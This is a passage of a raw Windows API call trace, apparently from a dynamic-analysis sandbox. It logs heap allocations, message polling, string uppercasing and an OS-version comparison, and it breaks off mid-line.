[0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.087] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.087] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.087] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0253.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.088] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0253.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0253.088] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0253.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0253.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.090] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.090] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0253.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.091] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0253.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.092] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.093] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.094] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.101] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0253.101] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.101] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0253.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0253.102] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0253.102] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0253.102] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0253.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0253.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | 